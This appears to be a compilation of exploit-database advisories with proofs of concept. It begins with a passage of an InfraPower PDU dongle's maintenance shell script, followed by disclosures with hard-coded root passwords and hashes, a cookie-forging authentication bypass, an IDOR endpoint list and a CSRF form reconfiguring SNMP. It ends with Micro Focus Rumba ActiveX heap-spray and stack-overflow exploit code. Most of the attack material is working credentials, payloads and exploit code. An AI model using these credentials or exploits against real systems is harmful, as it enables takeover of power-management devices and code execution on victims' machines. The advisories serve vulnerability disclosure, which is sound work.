echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/www/patch/patch_now.sh" ]; then
chmod 777 /www/patch/patch_now.sh
sh /www/patch/patch_now.sh
else
echo "file not exist: /www/patch/patch_now.sh"
fi
fi
;;
"9")
echo "****Process List*******************************"
ps
echo "***********************************************"
;;
"A")
echo "(A) Patch SNMP "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/www/patch/snmplink.sh" ]; then
sh /www/patch/snmplink.sh
if [ -f "/www/snmplink.log" ]; then
cat /www/snmplink.log
fi
echo "Patching SNMP and its modules...done"
else
echo "file not exist: /www/patch/snmplink.sh"
fi
fi
;;
"B")
echo "(B) Restore Box Configuration(box_conf) "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/etc/box_conf" ]; then
echo "Patching /mnt/mtd/box_conf..."
cp /etc/box_conf /mnt/mtd/box_conf
if [ -f "/mnt/mtd/box_conf" ]; then
echo "Patching /mnt/mtd/box_conf...done"
else
echo "Patching /mnt/mtd/box_conf...failed"
fi
else
echo "file not exist: /etc/box_conf"
fi
fi
;;
"P")
INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ \t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1`
echo "(P) Restore INI, POL profiles for $INFRA_VER "
echo -n "Are you sure to continue? [y/n]:"
read ansP
if [ "$ansP" == "y" ]; then
if [ "$InfraType" == "1" ]; then
echo "Restoring INI, POL profiles for $INFRA_VER..."
if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then
echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..."
cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini
echo "...done"
fi
if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then
echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..."
cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol
echo "...done"
fi
if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then
echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..."
cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini
echo "...done"
fi
if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then
echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..."
cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol
echo "...done"
fi
if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then
echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..."
cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini
echo "...done"
fi
if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then
echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..."
cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol
echo "...done"
fi
if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then
echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..."
cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini
echo "...done"
fi
if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then
echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..."
cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol
echo "...done"
fi
fi
fi
;;
"E")
echo -n "Input command line:"
read cmd_line
$cmd_line
;;
"M")
if [ -f "/mnt/mtd/log_memCheck.txt" ]; then
cat /mnt/mtd/log_memCheck.txt
fi
;;
"R")
echo "(R) Reboot "
echo -n "Are you sure to continue? [y/n]:"
read ansR
if [ "$ansR" == "y" ]; then
echo "Rebooting..."
reboot
fi
;;
"X")
echo "su mode started!"
su
;;
"Q")
echo "Leaving maintenance mode........OK"
exit 0
;;
esac
done
InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from a use of hard-coded credentials. The IP
dongle firmware ships with hard-coded accounts that can be used to gain
full system access (root) using the telnet daemon on port 23.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5371
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php
27.09.2016
--
# cat /etc/passwd
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
# showing accounts in root group:
Username: root
Password: 8475
--
Username: service
Password: ipdongle
--
Username: www
Password: 9311
--
Username: www2
Password: 9311
# showing other less-privileged accounts:
Username: user
Password: 8475
--
Username: admin
Password: 8475
--------
/mnt/mtd # echo $SHELL
/sbin/root_shell.sh
/mnt/mtd # cat /sbin/root_shell.sh
#!/bin/sh
trap "" 2 3 9 24
# check login
passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`
if [ "$passWork" = "1" ]; then
login_file=/mnt/mtd/root_login
now_timestamp=`date +%s`
if [ -f $login_file ]; then
line=`wc -l $login_file | cut -c 1-9`
if [ "$line" != " 0" ] && [ "$line" != " 1" ] && [ "$line" != " 2" ]; then
pre_login=`tail -n 3 $login_file | cut -d " " -f 1`
pre_result1=`echo $pre_login | cut -d " " -f 1`
pre_result2=`echo $pre_login | cut -d " " -f 2`
pre_result3=`echo $pre_login | cut -d " " -f 3`
if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then
pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`
result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`
if [ "$result" != "success" ]; then
echo $result
exit 0
fi
fi
fi
fi
echo -n "password:"
read pass
if [ "$pass" != "999" ]; then
echo "wrong password"
echo fail $now_timestamp >> $login_file
exit 0
fi
echo success $now_timestamp >> $login_file
fi
/bin/sh
/mnt/mtd #
--------
/mnt/mtd # ls
IMG001.exe boot.old.sh load_config.log main_conf net_conf passwd_conf snmp_conf web_conf
PDU3_ini box_conf log_memCheck.txt main_conf.bak net_conf.old port_conf snmpd.conf
PDU3_pol info.zip mac_addr me_login ntp_conf private start_service.log
--------
/mnt/mtd # df -h
Filesystem Size Used Available Use% Mounted on
tmpfs 256.0M 4.0K 256.0M 0% /tmp
/dev/mtdblock1 1.4M 96.0K 1.3M 7% /mnt/mtd
/dev/mtdblock5 1.0M 60.0K 964.0K 6% /mnt/mtd1
/dev/mtdblock6 1.0M 60.0K 964.0K 6% /mnt/mtd2
/dev/mtdblock7 1.0M 60.0K 964.0K 6% /mnt/mtd3
--------
/www # ls -al
drwxr-xr-x 5 1013 1014 0 Jan 13 08:41 .
drwxr-xr-x 16 root root 0 Nov 28 11:17 ..
-rwxr--r-- 1 1013 1014 6875 Apr 22 2014 CSSSource.php
-rwxr--r-- 1 1013 1014 291 Apr 22 2014 Config.php
-rwxr--r-- 1 1013 1014 1685 Apr 22 2014 ConnPort.php
-rwxr--r-- 1 1013 1014 5787 Apr 22 2014 FWUpgrade.php
-rwxr--r-- 1 1013 1014 7105 Apr 22 2014 Firmware.php
-rwxr--r-- 1 1013 1014 10429 Apr 22 2014 Function.php
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 General
-rwxr--r-- 1 1013 1014 1407 Apr 22 2014 Header.php
-rwxr--r-- 1 1013 1014 6775 Apr 22 2014 IPSettings.php
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 Images
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 JavaScript
-rwxr--r-- 1 1013 1014 408 Apr 22 2014 JavaSource.php
-rwxr--r-- 1 1013 1014 849 Apr 22 2014 ListFile.php
-rwxr--r-- 1 1013 1014 12900 Apr 22 2014 Login.php
-rwxr--r-- 1 1013 1014 355 Apr 22 2014 Logout.php
-rwxr--r-- 1 1013 1014 352 Apr 22 2014 Main_Config.php
-rwxr--r-- 1 1013 1014 5419 Apr 22 2014 Menu.php
-rwxr--r-- 1 1013 1014 942 Apr 22 2014 Menu_3.php
-rwxr--r-- 1 1013 1014 4491 Apr 22 2014 Ntp.php
-rwxr--r-- 1 1013 1014 23853 Apr 22 2014 OutletDetails.php
-rwxr--r-- 1 1013 1014 1905 Apr 22 2014 OutletDetails_Ajax.php
-rwxr--r-- 1 1013 1014 48411 Apr 22 2014 PDUDetails.php
-rwxr--r-- 1 1013 1014 4081 Apr 22 2014 PDUDetails_Ajax_Details.php
-rwxr--r-- 1 1013 1014 1397 Apr 22 2014 PDUDetails_Ajax_Outlet.php
-rwxr--r-- 1 1013 1014 19165 Apr 22 2014 PDULog.php
-rwxr--r-- 1 1013 1014 29883 Apr 22 2014 PDUStatus.php
-rwxr--r-- 1 1013 1014 4418 Apr 22 2014 PDUStatus_Ajax.php
-rwxr--r-- 1 1013 1014 7791 Apr 22 2014 PortSettings.php
-rwxr--r-- 1 1013 1014 24696 Apr 22 2014 SNMP.php
-rwxr--r-- 1 1013 1014 38253 Apr 22 2014 SensorDetails.php
-rwxr--r-- 1 1013 1014 27210 Apr 22 2014 SensorStatus.php
-rwxr--r-- 1 1013 1014 5984 Apr 22 2014 SensorStatus_Ajax.php
-rwxr--r-- 1 1013 1014 40944 Apr 22 2014 System.php
-rwxr--r-- 1 1013 1014 4373 Apr 22 2014 UploadEXE.php
-rwxr--r-- 1 1013 1014 9460 Apr 22 2014 User.php
-rwxr--r-- 1 1013 1014 23170 Apr 22 2014 WriteRequest.php
-rwxr--r-- 1 1013 1014 8850 Apr 22 2014 WriteRequest_Ajax.php
-rwxr--r-- 1 1013 1014 10811 Apr 22 2014 dball.php
-rwxr--r-- 1 1013 1014 771 Apr 22 2014 doupgrate.php
-rwxr--r-- 1 1013 1014 76 Apr 22 2014 index.php
-rwxr--r-- 1 1013 1014 49 Apr 22 2014 nfs.sh
-rwxr--r-- 1 1013 1014 5410 Apr 22 2014 production_test1.php
-rwxr--r-- 1 1013 1014 723 Apr 22 2014 vaildate.php
-rwxr--r-- 1 1013 1014 611 Apr 22 2014 wiseup.php
InfraPower PPS-02-S Q213V1 Insecure Direct Object Reference Authorization Bypass
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: Insecure Direct Object References occur when an application
provides direct access to objects based on user-supplied input. As
a result of this vulnerability attackers can bypass authorization
and access resources and functionalities in the system directly, for
example APIs, files, upload utilities, device settings, etc.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5373
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5373.php
27.09.2016
--
GET /ConnPort.php
GET /CSSSource.php
GET /dball.php
GET /doupgrate.php
GET /IPSettings.php
GET /ListFile.php
GET /Menu.php
GET /Ntp.php
GET /PDUDetails_Ajax_Details.php
GET /PDULog.php
GET /PortSettings.php
GET /production_test1.php ("backdoor")
GET /UploadEXE.php
InfraPower PPS-02-S Q213V1 Authentication Bypass Vulnerability
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: The device does not properly perform authentication, allowing
it to be bypassed through cookie manipulation. The vulnerable function
checkLogin() in 'Function.php' checks only if the 'Login' Cookie is empty
or not, allowing easy bypass of the user security mechanisms.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5374
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5374.php
27.09.2016
--
(example) System.php:
---------------------
1: <?php
2:
3: require_once("Function.php");
4: session_start();
5: if(!checkLogin())
6: header('Location: Login.php');
7:
---------------------------------------
Function.php:
-------------
155: function checkLogin(){
156: if(empty($_SESSION['Login']))
157: return false;
158: return true;
159: }
160:
--------------------
'Sessioned' scripts:
➜ www grep -rHn 'session_start' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/Login.php:2: session_start();
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:2: session_start();
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:9: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/System.php:4: session_start();
/Users/liwomac/Desktop/infrapower_files/www/User.php:3: session_start();
➜ www grep -rHn 'session_destroy' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Function.php:256: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/Function.php:266: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:7: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/System.php:53: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/System.php:63: session_destroy();
➜ www grep -rHn '$_SESSION' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Function.php:11: if(isset($_SESSION['ite'])){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:12: $this->init($_SESSION['ite']);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:156: if(empty($_SESSION['Login']))
/Users/liwomac/Desktop/infrapower_files/www/Function.php:233: if(!isset($_SESSION['TimeSync'])){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:234: $_SESSION['TimeSync'] = getConf("/mnt/mtd/main_conf", "TimeSyncPDU_opt");
/Users/liwomac/Desktop/infrapower_files/www/Function.php:235: if($_SESSION['TimeSync'] == "ON"){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:237: $_SESSION['SyncDate'] = explode(":",$SyncDate);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:239: $_SESSION['TimeSync'] = "OFF";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:240: $_SESSION['SyncDate'][0] = "0";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:241: $_SESSION['SyncDate'][1] = "0";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:255: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:265: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Login.php:31: $_SESSION['ite'] = substr($this->InfraType,1,1); // e.g."t3v3" get the second chr 3;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:64: $_SESSION['ite'] = "1";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:67: $_SESSION['ite'] = "2";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:70: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:73: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:76: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:79: $_SESSION['ite'] = "4";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:82: $_SESSION['ite'] = FALSE;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:91:$_SESSION['ite'] = $InfraType;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:137: $_SESSION['Login'] = $_POST['ID_User'];
/Users/liwomac/Desktop/infrapower_files/www/Login.php:140: $_SESSION['Login'] = $_POST['ID_User'];
/Users/liwomac/Desktop/infrapower_files/www/Login.php:156: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
/Users/liwomac/Desktop/infrapower_files/www/Login.php:167: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:3: $_SESSION['Login'];
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:4: if (isset($_SESSION['Login'])){
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:5: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Menu.php:60: /*if ($_SESSION["SS_SystemCreated"] == "1") {
/Users/liwomac/Desktop/infrapower_files/www/System.php:52: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/System.php:62: unset($_SESSION['Login']);
➜ www grep -rHn 'checkLogin' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/Function.php:155: function checkLogin(){
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/Login.php:165: if(checkLogin()) {
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:10: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/System.php:5: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/User.php:4: if(!checkLogin())
PoC:
javascript:document.cookie="Login=StrangerThings;expires=Sat, 09 Dec 2017 11:05:17 GMT"
--
InfraPower PPS-02-S Q213V1 Cross-Site Request Forgery
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with admin
privileges if a logged-in user visits a malicious web site.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5375
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5375.php
27.09.2016
--
PoC:
<html>
<body>
<form action="http://192.168.0.17/SNMP.php?Menu=SMP" method="POST">
<input type="hidden" name="SNMPAgent" value="Enable" />
<input type="hidden" name="CommuintyString" value="public" />
<input type="hidden" name="CommuintyWrite" value="private" />
<input type="hidden" name="TrapsVersion" value="v2Trap" />
<input type="hidden" name="IP" value="192.168.0.254" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Micro Focus Rumba <= 9.3 ActiveX Stack-based buffer overflow
# Date: 29-10-2016
# Exploit Author: Umit Aksu
# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28600.micro-focus-rumba-9-x-security-update.aspx
# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40231
# Version: <= 9.3
# Tested on: Internet Explorer 11 on windows 7
# CVE : CVE-2016-5228
1. Description
Stack-based buffer overflow in the PlayMacro function in ObjectXMacro.ObjectXMacro in WdMacCtl.ocx in Micro Focus Rumba 9.x before 9.3 HF 11997 and 9.4.x before 9.4 HF 12815 allows remote attackers to execute arbitrary code via a long MacroName argument.
2. Proof of Concept
The code below sprays the memory to have a valid memory address which can then be used to reference... the exploit code only makes it possible to overwrite the EIP the rest is up to you.
<html>
<head>
<object classid='clsid:56359FC0-E847-11CE-BE79-02608C8F68F1' id='_vulActiveX'>
</object>
</head>
<body>
<div id="blah"></div>
<script language="javascript">
function vuln(){
// 272 Junk Data
// 272 + "\x43\x43\x43\x43" = EDX = 43434343
//
// If we change the edx to an address that point to a valid address
// We will have control over EIP
// 0x20302228
// Overwrite the stack
var evil_payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
// Addres pointing to our sprayed heap
var EDX = "\x28\x22\x30\x20";
evil_payload += EDX;
_vulActiveX.PlayMacro(evil_payload);
}
// This create blocks of memory with data we control
// And attaches the data to a button.title
// By doing this we have a predicatable place in memory containing our data
// This data can by used to place shellcode in it and can be used like in this case to
// point to valid address to overwrite EIP
// Heap Spraying technique of corelanc0d3r
// See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
var div_container = document.getElementById("blah");
div_container.style.cssText = "display:none";
var data;
offset = 0x104;
var jmp_address="\x28\x22\x30\x20";
junk = unescape("%u4747%u4747"); // <-------- EIP Value
while(junk.length < 0x1000) junk += junk;
// 20302290
shellcode = unescape("%u2290%u2030%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444");
data = junk.substring(0,offset) + shellcode;
data += junk.substring(0,0x800 - offset - shellcode.length);
while(data.length < 0x80000) data += data
// Targets:
// FireFox: 0x20302210
// IE 8, 9 and 10/11: 0x20302228
for(var i = 0; i < 0x500; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0,0x40000-0x58);
div_container.appendChild(obj);
}
</script>
<input type="button" onclick="javascript:vuln()" value="exploit" >
</body>
</html>
# Exploit Title: Micro Focus Rumba 9.4 Multiple Local Stack-overflow
# Date: 29-10-2016
# Exploit Author: Umit Aksu
# Vendor Homepage: http://www.microfocus.com/
# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40231
# Version: 9.4
# Tested on: Internet Explorer 11 on windows 7
# CVE :
1. Description
Multiple local stack overflow vulnerabilities which can used when to exploit when learning exploit development.
Note: Rumba uses send.exe and receive.exe to send and receive files so it might be possible to exploit this remotely.
2. Proof of Concept
The code below sprayes the memory to have a valid memory address which can then be used to reference... the exploit code only makes it possible to overwrite the EIP the rest is up to you.
C:\Program Files (x86)\Micro Focus\RUMBA\System>send c:\aaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaa C:\dddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
RUMBA Command-line File Transfer Utility
SEH + NSEH overwritten
C:\Program Files (x86)\Micro Focus\RUMBA\System>receive.exe c:\aaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaa C:\dddddddddddddddddddddddddddddddddddddddddddddddddddd
